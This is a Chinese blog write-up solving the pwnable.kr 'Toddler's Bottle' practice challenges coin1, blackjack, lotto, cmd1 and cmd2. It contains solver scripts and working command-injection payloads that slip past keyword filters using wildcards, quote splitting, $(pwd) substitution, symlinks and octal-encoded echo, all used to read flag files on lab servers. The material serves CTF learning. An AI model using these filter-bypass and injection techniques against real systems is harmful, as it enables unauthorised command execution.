Pwnable之[Toddler's Bottle](二)

最新推荐文章于 2018-03-30 16:35:03 发布
最新推荐文章于 2018-03-30 16:35:03 发布
阅读量313 收藏
点赞数
分类专栏: PWN 幼儿 Bottle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35495684/article/details/79518250
版权

Pwnable之[Toddler’s Bottle](2)

Pwn挑战地址

11.coin1

nc 连上。

这里写图片描述
要你玩一个游戏,游戏的规则是:
你手里拿了几枚金币。
然而,其中有一枚假币。
假币和真币一模一样。
然而,它的重量不同于真正的重量。
真币重10,假币重达9
帮我找一个带刻度的假币
如果你发现100个假币,你将得到奖励:
还有,你有30秒的时间。

比如,n=4 c= 2 4个硬币,2次验证的机会
输入:0 1 #验证第一个第二个硬币
回显:20
输入:3 #验证第4个硬币
回显:10
那么答案就是2,第三个硬币是假的了
输入:2
回显:Correct

重复获得100次Correct就可以得到flag。

OK,典型的二分法。
代码走起:

#coding:utf-8
from pwn import *
import re
def get_weight(st,en,r):
    send_str=""
    if(st==en):
        send_str=str(en)
    else:
        for i in range(st,en+1):
            send_str=send_str+str(i)+" "
    r.sendline(send_str)
    ret=r.recvline()
    #print '[*]','-'*18," ",ret
    return int(ret)
def choose_coin(num,cha,r):
    start=0
    end=num-1
    all_weight=0
    for i in range(0,cha):
        #print str(i),'~'*10,'test'," ",start,end
        all_weight=get_weight(start,int((start+end)/2),r)
        if(all_weight%10==0):
            start=int((start+end)/2)
        else:
            end=int((start+end)/2)
    #print 'this is end:',str(end)
    r.sendline(str(end))
    print '[+] Server:',r.recvline()

r=remote('pwnable.kr',9007)
print r.recv()
for i in range(0,100):
    print '[*]','='*18," ",i," ","="*18 ,"[*]"#第一次尝试
    recvword = r.recvline()
    print "[+]server: ",recvword
    p = re.compile(r'\d+')#匹配所有的数字
    data = p.findall(recvword)
    num = int(data[0])#N
    chance = int(data[1])#C
    choose_coin(num,chance,r)
print r.recvline()
print r.recvline()

跑完你会发现,30秒根本不够,因为服务器响应时间太久了,像这样:
这里写图片描述

看了下大佬的,直接放到它服务器上跑。
需要去前面的做过的具有执行权限的地方跑。
想到了input那题的 var/tmp
登入进去跑。
发现这里没有pwn。
这里写图片描述
这时候要怎么办?

1.找到有pwn的。

又看下大佬的,需要到/tmp上。
这里要注意的是,r=remote(‘pwnable.kr’,9007)要改为r=remote(‘0.0.0.0’,9007)
响应本地服务器的9007端口。
进入/tmp
vi jaken_coin
然后执行就好。
这里写图片描述

2.改pwn 的引用为socket的。

改后的代码为:

#coding:utf-8
from socket import *
import re
def get_weight(st,en,r):
    send_str=""
    if(st==en):
        send_str=str(en)
    else:
        for i in range(st,en+1):
            send_str=send_str+str(i)+" "
    r.send(send_str+"\n")
    ret=r.recv(1024)
    #print '[*]','-'*18," ",ret
    return int(ret)
def choose_coin(num,cha,r):
    start=0
    end=num-1
    all_weight=0
    for i in range(0,cha):
        #print str(i),'~'*10,'test'," ",start,end
        all_weight=get_weight(start,int((start+end)/2),r)
        if(all_weight%10==0):
            start=int((start+end)/2)
        else:
            end=int((start+end)/2)
    #print 'this is end:',str(end)
    r.send(str(end)+"\n")
    print '[+] Server:',r.recv(1024)
r=socket(AF_INET,SOCK_STREAM)
#AF_INET表示将使用标准的ipv4地址或主机名  
#SOCK_STREAM说明这是一个TCP客户端

r.connect(('pwnable.kr',9007))
print r.recv(2048)
for i in range(0,100):
    print '[*]','='*18," ",i," ","="*18 ,"[*]"#第一次尝试
    recvword = r.recv(1024)
    print "[+]server: ",recvword
    p = re.compile(r'\d+')#匹配所有的数字
    data = p.findall(recvword)
    num = int(data[0])#N
    chance = int(data[1])#C
    choose_coin(num,chance,r)
print r.recv(1024)
r.close()

同样,吧pwnable.kr改为0.0.0.0,放到var/tmp上。
OK~
这里写图片描述

12.blackjack

blackjack又名’二十一点‘。
源代码位置在:
https://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html
nc 上,玩了下这个游戏
最多玩到16000.
题目说要到100,0000万才可以给你flag。

第一个想法,刷,每次500。看看能不能刷到。
可是100,0000/500=2000
至少2000次?
发现代码有点臃肿,先放这,以后再写下:

r=remote('pwnable.kr',9009)
print r.recv()

#print '[*]','='*18," ",i," ","="*18 ,"[*]"#第一次尝试
for i in  range(0,60):
    print r.recvline()
    if(i==36):
        r.sendline("y")
    if(i==41):
        r.sendline("1")

r.sendline("1")

print r.recvline()

尝试无果后,忽然想到如果我输入-500会怎样?
这里写图片描述
然后一直按H故意输掉,会不会变为1000呢?
这里写图片描述
果然可以。
问题出现在这里:

int betting() //Asks user amount to bet
{
 printf("\n\nEnter Bet: $");
 scanf("%d", &bet);

 if (bet > cash) //If player tries to bet more money than player has
 {
        printf("\nYou cannot bet more money than you have.");
        printf("\nEnter Bet: ");
        scanf("%d", &bet);
        return bet;
 }
 else return bet;
} // End Function

没有对输入参数进行判断,如果输入-500,-(-500)就变成+500了。

那就直接-100,0000走起,然后赢一局就好了。
这里写图片描述

13.Lotto

代码:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

unsigned char submit[6];

void play(){

    int i;
    printf("Submit your 6 lotto bytes : ");
    fflush(stdout);

    int r;
    r = read(0, submit, 6);

    printf("Lotto Start!\n");
    //sleep(1);

    // generate lotto numbers
    int fd = open("/dev/urandom", O_RDONLY);
    if(fd==-1){
        printf("error. tell admin\n");
        exit(-1);
    }
    unsigned char lotto[6];
    if(read(fd, lotto, 6) != 6){
        printf("error2. tell admin\n");
        exit(-1);
    }
    for(i=0; i<6; i++){
        lotto[i] = (lotto[i] % 45) + 1;     // 1 ~ 45
    }
    close(fd);

    // calculate lotto score
    int match = 0, j = 0;
    for(i=0; i<6; i++){
        for(j=0; j<6; j++){
            if(lotto[i] == submit[j]){
                match++;
            }
        }
    }

    // win!
    if(match == 6){
        system("/bin/cat flag");
    }
    else{
        printf("bad luck...\n");
    }

}

void help(){
    printf("- nLotto Rule -\n");
    printf("nlotto is consisted with 6 random natural numbers less than 46\n");
    printf("your goal is to match lotto numbers as many as you can\n");
    printf("if you win lottery for *1st place*, you will get reward\n");
    printf("for more details, follow the link below\n");
    printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
    printf("mathematical chance to win this game is known to be 1/8145060.\n");
}

int main(int argc, char* argv[]){

    // menu
    unsigned int menu;

    while(1){

        printf("- Select Menu -\n");
        printf("1. Play Lotto\n");
        printf("2. Help\n");
        printf("3. Exit\n");

        scanf("%d", &menu);

        switch(menu){
            case 1:
                play();
                break;
            case 2:
                help();
                break;
            case 3:
                printf("bye\n");
                return 0;
            default:
                printf("invalid menu\n");
                break;
        }
    }
    return 0;
}

代码的意思是要你输入6个字节的lotto彩票,然后从本地/dev/urandom 随机文件中读取6个文件来和你输入的对比。
其中,被对比的lotto是:

for(i=0; i<6; i++){
        lotto[i] = (lotto[i] % 45) + 1;     // 1 ~ 45
    }

由代码可知lotto的字符为1-45。。。
从45个字符中选中6个全对的概率是1/45^6,爆破?省省吧。
答案不可能是这样。。。
果然,问题就出现在这个判断胜利的函数里:

int match = 0, j = 0;
    for(i=0; i<6; i++){
        for(j=0; j<6; j++){
            if(lotto[i] == submit[j]){
                match++;
            }
        }
    }

    // win!
    if(match == 6){
        system("/bin/cat flag");
    }
    else{
        printf("bad luck...\n");
    }

那两个for循环共36次对比,每次lotto中的1个符号都要和submit中所有字符进行比对,相等则match++。match=6 就获得flag。
很明显,如果我输入都是同样的,例如’#’,且lotto[6]中恰好就只有一个#字符。那么match不就等于6了吗?这种概率就是44^6/45^6~0.874.
这概率就很可观了,大概两次就可以了。
那么我们还知道。ascii的1-32是不可见字符,如32代表的就是空格。
下面就是我们可见可输入的ascii 33-45 即’!’ ~ ’ - ‘。
这里写图片描述

解题方式:
输入6个#。
这里写图片描述
两次就拿到flag了。

14.cmd1

代码:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){//判断是否有"flag"、"sh"、"tmp"子串。
    int r=0;
    r += strstr(cmd, "flag")!=0;
    r += strstr(cmd, "sh")!=0;
    r += strstr(cmd, "tmp")!=0;
    return r;
}
int main(int argc, char* argv[], char** envp){
    putenv("PATH=/fuckyouverymuch");
    if(filter(argv[1])) return 0;
    system( argv[1] );
    return 0;
}

题目的意思是你输入一个参数运行,程序判断参数是否含有”flag”、”sh”、”tmp”子串,如果没有,则system执行第一个参数。

putenv 函数用来向环境表中 添加或者修改 环境变量。
函数原型:
这里写图片描述

当然,问题不是出在这个函数,这里只是顺便学习下,而是那个判断函数。
r += strstr(cmd, “flag”)!=0;
r += strstr(cmd, “sh”)!=0;
r += strstr(cmd, “tmp”)!=0;
是准确的匹配。
那如果我用
linux执行命令特有的
flg* 或者 拼接呢
我们用/bin/cat /home/cmd1/fla* 试试
这里写图片描述
或者 /bin/cat ‘/home/cmd1/fla’‘g’
这里写图片描述

还有一个思路是用这个cmd1程序调用另一个程序,该程序有获得falg的指令,然后在有执行权限的地方执行cmd1调用就可以直接获得flag。

例如:
cd /tmp
vi jaken

/bin/cat /home/cmd1/flag

chmod +777 jaken
/home/cmd1/cmd1 “./jaken”

15.cmd2

代码:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "=")!=0;
    r += strstr(cmd, "PATH")!=0;
    r += strstr(cmd, "export")!=0;
    r += strstr(cmd, "/")!=0;
    r += strstr(cmd, "`")!=0;
    r += strstr(cmd, "flag")!=0;
    return r;
}

关键还是这个函数,它过滤了‘/’,前面的方法不行了。
看了前面的cmd1除了这个方法还有改PATH和export哎,有空复现下。
那就想办法绕过‘/’。
刚开始没什么想法,后面看了下大神的提示,重点在pwd这个指令。
我们都知道pwd是输出当前路径。
那如果在跟目录的话不就是‘/’了。。。
尝试在根目录构造
./home/cmd2/cmd2 ‘“echo $(pwd)”’
发现回显:
这里写图片描述
改为:./home/cmd2/cmd2 ‘”“echo $(pwd)”“’
发现成功回显‘/’:
这里写图片描述
不知道为啥要两个””
那么后面的就简单了。
构造payload:

./home/cmd2/cmd2 '""$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fl*""'

获得flag。
然后总结下看见大佬的骚思路:
1.一样是绕过pwd,不过不在根目录,在有执行权限的/tmp,利用pwd构造出cat命令。
再利用软链接:
cat的软链接,ln -s /bin/cat cat
flag的软链接,ln -s /home/cmd2/flag flag
然后直接执行 /home/cmd2/cmd2 “$(pwd)t f*”
具体如下:
这里写图片描述

2.用echo 进制解析进行绕过
(echo 命令不通过参数 e 也可以解析出 16 进制 和 8 进制的字串,不过不同 echo 版本会对这个功能有所限制,而虚拟机 Ubuntu 16.04 的 echo 就无法解析,只有 echo -e 才能解析特殊字符)

下面构造测试:
16进制:

from pwn import *
cmd="/bin/cat home/cmd2/flag"
print "\\"+"\\".join(hex(c) for c in ordlist(cmd))

获得,

\0x2f\0x62\0x69\0x6e\0x2f\0x63\0x61\0x74\0x20\0x2f\0x68\0x6f\0x6d\0x65\0x2f\0x63\0x6d\0x64\0x32\0x2f\0x66\0x6c\0x61\0x67

用8进制:

from pwn import *
cmd="/bin/cat /home/cmd2/flag"
print "\\"+"\\".join(oct(c) for c in ordlist(cmd))

得到,

\057\0142\0151\0156\057\0143\0141\0164\040\057\0150\0157\0155\0145\057\0143\0155\0144\062\057\0146\0154\0141\0147

测试下:
这里写图片描述
发现8进制成功解析。
那么就可以构造:

./cmd2 '$(echo -e "\057\0142\0151\0156\057\0143\0141\0164\040\057\0150\0157\0155\0145\057\0143\0155\0144\062\057\0146\0154\0141\0147")'

发现没有-e 可能是那个添加的环境没有,那就把-e去掉
如图,获得flag~
这里写图片描述

参考文章:
https://www.jianshu.com/p/c70e50710804
http://www.cnblogs.com/p4nda/p/7147552.html

Jaken1223
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Toddler Tap-开源
07-20
一个针对看到您使用键盘并希望这样做的幼儿的项目。 在其当前配置中,该项目将显示一个项目、单词并说出与按下的键相关的单词。
pwnable 题目解析:[Toddler's Bottle]-lotto 逻辑漏洞
个人笔记
02-27 337
0x10 题目描述 Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) 本题是 pwnable 中的入门级试题,代码本身不含漏洞,而是逻辑问题。时至今日,很多传统的堆栈溢出漏洞不再那么容易找到,而那些设计问题或者代码中的逻辑问题,往往...
PWN学习之[Toddler''s Bottle]-[passcode]
Magic1an的博客
08-19 479
打开passcode.c,可以看到源码如下:#include <stdio.h> #include <stdlib.h>void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflush(stdin); // ha!
[Toddler's Bottle]-[flag]
ACdream
05-10 781
这个7分的题其实很脑洞 方法很简单:拖入IDA中查找字符串 看到什么熟悉的东西了吗?对,upx 肯定是upx加壳处理过的 那么呢,需要百度一发找工具呗,linux下的upx加壳脱壳工具就这个: sudo apt-get install upx 在terminal下输入upx查找使用方法 脱壳命令是-d upx -d flag就可以把文件脱壳
Pwnable之[Toddler's Bottle](三)--memcpy
杀生丸?不,其实我要的是桔梗
03-30 373
Pwnable之[Toddler’s Bottle](三)–memcpy 提示是: Are you tired of hacking?, take some rest here. Just help me out with my small experiment regarding memcpy performance. after that, flag is yours. 黑累了吗?...
PWN学习之[Toddler''s Bottle]-[fd]
Magic1an的博客
08-19 353
在linux命令行界面输入ssh fd@pwnable.kr -p2222 密码为guest链接上后发现目录下有fd fd.c和flag三个文件,直接cat flag查看flag会显示无权限,必须通过fd可执行文件进行获取flag.查看fd.c,源码比较简单#include <stdio.h> #include <stdlib.h> #include <string.h> char buf[32]
A Toddler Game-开源
05-26
幼儿游戏(1-4岁),可教授字母和数字的声音,并具有其他基本的教育内容。 这是使用SDL用C#编写的。 它是在Linux上编写的,但应在具有Mono(或.NET)和SDL的任何文件上运行。
Kids Key - Alphabet Training for Toddler-开源
04-28
一个适合小孩(1-4岁)的简单“游戏”,它使用字母和骑车颜色来帮助教导和增强ABC的颜色和数字。 这是向幼儿和父母可以理解并从中受益的简单计算迈出的一步。
toddler-ng:下一代Toddler,一款精心设计的可用便携式微内核操作系统
03-05
幼儿下一代幼儿主要目标用C99编写带有设备树支持的所有体系结构的统一启动协议,与x86上的ACPI和PPC / SPARC上的OFW相结合支持更多架构(ARM,PowerPC,x86,RISC-V,Alpha,SPARC,m68k)和机器(例如,多个ARM板)...
Toddler-care-website:使用 Django 的互联网编程实验室迷你项目
08-04
幼儿护理网站 -------互联网编程实验室迷你项目------- 这是一个使用 Django 框架构建的网站,用于聘请保姆和订购产品来照顾幼儿。
[Toddler's Bottle]fd
jmp esp
04-17 422
题目描述解题过程0x01ssh 进入到目标服务器 输入password0x02ls 查看服务器上的文件 发现 0x03cat flag 失败 permission denied cat fd.c 太显然了。。 输入的参数减去0x1234(4660十进制)之后作为文件描述符读入 然后和LETMEWIN比较 如果相同就可以得到flag了0x04关键在这里!fd=0 是stdin fd=1 是
[Toddler's Bottle]-collision
ACdream
04-23 533
慢慢来学习linux
pwnable 笔记 Toddler's Bottle - bof
HiTaQini
11-16 1898
缓存区溢出
pwnable.kr [Toddler's Bottle] - codemap
Re:Umiade.tr
06-02 1054
写在最前:想要成为安全大牛的愿望还是这么遥不可及。 渐渐地,没有什么忧虑的大学生活也好像开始有了一些属于小人物的忐忑。 还是坚信自己很厉害,可是道路前方仍是一篇迷蒙。感谢帮助过我的前辈,以及让我可以暂时不考虑经济压力的父母。 I have a binary that has a lot information inside heap. How fast can you reverse-
pwnable.kr [Toddler's Bottle] - lotto
Re:Umiade.tr
03-22 791
Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) 同样是一个小游戏,考查…细心程度。源码如下:#include <stdio.h> #include <stdlib.h> #include <string.h> #incl
node-v10.22.0-darwin-x64.tar.xz
最新发布
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于JAVA的物流管理系统的源码设计与实现.zip
05-03
毕业设计-->物流管理系统的设计与实现(Java版本) 采用Struts2+hibernate+Oracle10g+Tomcat 涉及车辆管理,配送点管理,运输方式管理,订单管理,员工管理,用户管理,部门管理,权限管理,角色管理等基础管理功能。
基于VB+access实现的成绩分析统计系统(论文+源代码).zip
05-03
基于VB+access实现的成绩分析统计系统(论文+源代码) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
node-v10.14.2-linux-x64.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转为java数组
12-07
以下是将字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转换为Java数组的代码示例: ```java String[] strArr = {"Baby",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值